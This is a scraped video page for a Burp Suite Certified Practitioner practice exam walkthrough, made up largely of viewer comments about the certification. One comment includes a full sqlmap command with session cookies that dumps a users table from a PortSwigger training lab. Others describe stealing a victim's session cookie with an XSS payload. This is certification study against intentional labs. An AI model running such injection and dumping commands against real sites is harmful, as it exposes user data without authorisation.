Тёмный

Burp Suite Certified Practitioner: Practice Exam Walkthrough (December 2022) 

bmdyy
Подписаться 3,5 тыс.
Просмотров 15 тыс.
50% 1

Опубликовано:

 

30 сен 2024

Поделиться:

Ссылка:

Скачать:

Готовим ссылку...

Добавить в:

Мой плейлист
Посмотреть позже
Комментарии : 53   
@iakashx
@iakashx Год назад
Thank you. Keep uploading useful videos like this. I subbed. (:
@gashone
@gashone Год назад
one of the better explanations I've seen, great skill in penetration testing
@bmdyy
@bmdyy Год назад
Thank you
@tanishsaxena545
@tanishsaxena545 Год назад
Found new ippsec ❤️
@neoistheone2001
@neoistheone2001 Год назад
This is fantastic content, I really appreciate how concise your videos are. One thing that I think would be very helpful would be a suggestion on where in one's learning path each certification fits. For example. if I wanted to study toward OSEE, what order should I complete the OffSec training to make the process smooth and sequential. Where would things like CPTS, CBBH, and BSCP best fit on that path?
@TheDomork
@TheDomork Год назад
Nice video, learned the capabilities of burp suite👍 I would also suggest briefly explaining the tools, e.x. sqlmap with its parameters. It would be easier to follow the walkthrough ;)
@lucaliuk7877
@lucaliuk7877 2 месяца назад
You made so quick, How long your doing Pen tester brother? Anyway i didn't understand the 3rd part of the lab as you have managed the cookie go and back , but that's my unexperience in when understand what to do with the cookie's session. Good job !!
@45LAKSHMIS
@45LAKSHMIS Месяц назад
greattttttttttttttttttttttt!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
@FMisi
@FMisi 5 месяцев назад
The solution is not suitable as of 2024. The intended solution seems to be location = ...
@yaraalhumaidan6691
@yaraalhumaidan6691 Год назад
Burp has released a new practice exam, will there be a walkthrough?
@JuanBotes
@JuanBotes Год назад
Thanks for sharing and explaining the content appreciated \o/
@haxguy0
@haxguy0 7 месяцев назад
Wow I love the cURL to sqlmap trick. Thanks for the great content. Looking forward to diving into more of your vids
@kennyajiboye2760
@kennyajiboye2760 3 месяца назад
have you solve prractice exam 2
@MADhatter_AIM
@MADhatter_AIM Год назад
Could you make a YT-short on what you are using for addins in your browser please, i see foxy-proxy and others, could you explain abit.
@gojo1825
@gojo1825 6 дней назад
Poor Carlos
@salmankhanashlor2253
@salmankhanashlor2253 6 месяцев назад
Thanks itss ssooooooo informative
@unsupervisednonsense6663
@unsupervisednonsense6663 Год назад
That was amazing! I've just started portswigger and feel like a fish out of water. How long has it taken to get to your level? That was so impressive to this noob.
@ThrowAway-m2u
@ThrowAway-m2u Год назад
You do your thing man! A treat to watch, thank you - wish I had your calmness when pwning
@sydetraq3952
@sydetraq3952 Год назад
Bruh, the content just gets better and better. Looks like your covering everything on my path so far xD
@0xfsec
@0xfsec Год назад
Awesome skills! Please do more web app pentesting.
@youcefkel4743
@youcefkel4743 Год назад
this is excellent.
@tarunkumaryenni2159
@tarunkumaryenni2159 Год назад
Awesome content...On point.
@ao5468
@ao5468 Год назад
Hi there, for the 2nd lab I have tried this example: sqlmap '0ab100ce040068ae8025033f00be00b4.h1-web-security-academy.net/filtered_search?searchTerm=&OrganizeBy=DATE&blogger=' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' -H 'Accept-Language: en-US,en;q=0.9' -H 'Cache-Control: max-age=0' -H 'Connection: keep-alive' -H 'Cookie: _lab=46%7cMCwCFCb4ElBUvrVw9Oh7sgTgVclgbjg2AhRGDp0Dt%2fS%2bgBq%2bEvS0xiPLDOlc1q7AdfksQz0Jmk8GF5ib79NXOcUqtDUdSFNpj0gGfdCfxh7uzvFJTpULoTyWBtYG5dYsJW%2fVMxFGCOP6n9xlSeIyY2qqx340fU5jCY4sHjI%2fgl6jRpUUN2o%3d; session=oe4fNI4inKDaqcgN2E04UyToWTeKjExn' -H 'Sec-Fetch-Dest: document' -H 'Sec-Fetch-Mode: navigate' -H 'Sec-Fetch-Site: none' -H 'Sec-Fetch-User: ?1' -H 'Upgrade-Insecure-Requests: 1' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36' -H 'sec-ch-ua: "Google Chrome";v="111", "Not(A:Brand";v="8", "Chromium";v="111"' -H 'sec-ch-ua-mobile: ?0' -H 'sec-ch-ua-platform: "Linux"' --level 5 -D public -T users --dump --batch However, I am only getting this results: Database: public Table: users [3 entries] +---------+----------+ | A | username | +---------+----------+ | | | | | | | | | +---------+----------+
@ursr78122
@ursr78122 Год назад
Hi there, can you suggest please: what is the best way to make notes for preparation to Burp Suite exam or CPTS(htb academy)? I write down my notes in Obsidian app, the trouble is I can't define what should be there. 6 months ago when I was trying to prepare myself to Burp certification I was literally copying the whole explanation pages from burp academy.... and as a result quite =( Should notes look like commands and short explanations, or something more? In my previous notes was a ton of theory, and it was almost unusable in practice exam or any practical stuff. Thank in advance.
@bmdyy
@bmdyy Год назад
Hi, my notes are basically just the specific commands that I need to run to exploit/identify something. Occasionally I'll chuck in a very brief explanation. I don't think copy-pasting explanations will do much good, since it's not necessarily clear you understand the text then, so I'd suggest at least reading and then trying to write it down in your own words.
@ursr78122
@ursr78122 Год назад
@@bmdyy thank you very much!)
@chihoangcao6622
@chihoangcao6622 Год назад
@@bmdyy can i take a look at your beautiful note?
@NN-si6cl
@NN-si6cl Год назад
I had found that second exploit for SQLi in the ORDER BY, but I couldn't get sqlmap to exploit it. Will need to go back and try that again. Thanks.
@deecol1360
@deecol1360 Год назад
Does someone is able to pass the new practice exam ? I'm stuck on the 1st stage, impossible to get rid of it, seems very difficult
@droidh4x0r6
@droidh4x0r6 3 месяца назад
Thank you! With the way you explain it, it makes to sound it so easy :). Keep it up!
@soanzin
@soanzin 3 месяца назад
So many things i've learned in this video.. Nice content man ..
@hackingdemon0764
@hackingdemon0764 8 месяцев назад
When i click view exploit the xss payload is working and i can get the session in my acces log but when it comes to deliver to victim i dont receive their session finally i have added the payload into location then it worked
@otojon-x
@otojon-x Год назад
Thank you , you explained it so easy. Btw congrats, you earned a subscriber now :D
@Fahodinho
@Fahodinho Год назад
do you have some tips for the real exam? A video guide would be awesome.
@bmdyy
@bmdyy Год назад
I'm gonna copy-paste a message I wrote earlier today answering this same question: The real exam is pretty much just the practice exam but with 2 apps instead of 1. I believe each exam attempt is a randomly generated combination of slightly modified practice challenges. Therefore, I recommend having good notes of all the practice labs, specifically the payloads which worked. Aside from that, time management is crucial since you are only given 4 hours. In my opinion, the vulnerabilities were very obvious since the apps are quite small and similar to the practice challenges. Personally it took me 2 hours to finish everything. Portswigger academy has the 'random challenge' option which you could try out to practice identifying the vulnerability. My last tip for you, is that you should really familiarize yourself with the 'Exploit Server' so you already know how the exploits should be formatted and you don't waste time trying to learn that during the exam.
@fatihburaktoprak769
@fatihburaktoprak769 Год назад
Hey, this answer helpt me a lot. So I appreciate it. Btw if anyone reads this comment before Jan 2023, you have a free retake until Feb. Check your emails ;)
@Fahodinho
@Fahodinho Год назад
why base64 encode the cookie?
@bmdyy
@bmdyy Год назад
Just by habit to avoid any 'bad characters' messing up the URL. I suppose in this case you could do without it
@vincent70able
@vincent70able Год назад
ok bravo c'è una guida per l'esame burp in italiano ? grazie ciao
@Dexterlex
@Dexterlex 6 месяцев назад
That was a great informative video learned alot
@mariuscristianmircescu5646
@mariuscristianmircescu5646 8 месяцев назад
Thank you for the video. It is one of the greatest out there
@fer2127
@fer2127 Год назад
Wow this video was awesome u r insane dude
@mll4994
@mll4994 Год назад
keep going with your content brother. You are doing a good job 👍
@chihoangcao6622
@chihoangcao6622 Год назад
can i see your github on this?
@ejnixon
@ejnixon Год назад
you made this look easy
@fabiothebest89lu
@fabiothebest89lu 9 месяцев назад
very interesting!
@girumtsegaye8492
@girumtsegaye8492 Год назад
Not Zoom in the video
@setumakorli2236
@setumakorli2236 Год назад
Hey bro how can i connect with you i just started my role as a junior pentester in training and it feels so overwhelming sometimes the knowledge gap can be something
@bmdyy
@bmdyy Год назад
Hi, you can add me on LinkedIn (see channel page)
@sukeqkoar2568
@sukeqkoar2568 Год назад
what is the window manager you are using in kali, and what theme is it?
@bmdyy
@bmdyy Год назад
It's the default one with the dark Adwaita theme
@TheCyberWarriorGuy
@TheCyberWarriorGuy Год назад
:)
Далее
Coding a Web Server in 25 Lines - Computerphile
17:49
Просмотров 337 тыс.
How Hackers Write Malware & Evade Antivirus (Nim)
24:04
I failed the Hack The Box CPTS
14:23
Просмотров 411
Master Burp Suite Like A Pro In Just 1 Hour
51:29
Просмотров 83 тыс.
John Hammond: 17 Years in the Making
5:44
Просмотров 2,6 тыс.
My Guide to HTB’s CBBH Course/Exam
11:07
Просмотров 22 тыс.
My Guide to HTB’s CPTS Course/Exam
19:13
Просмотров 47 тыс.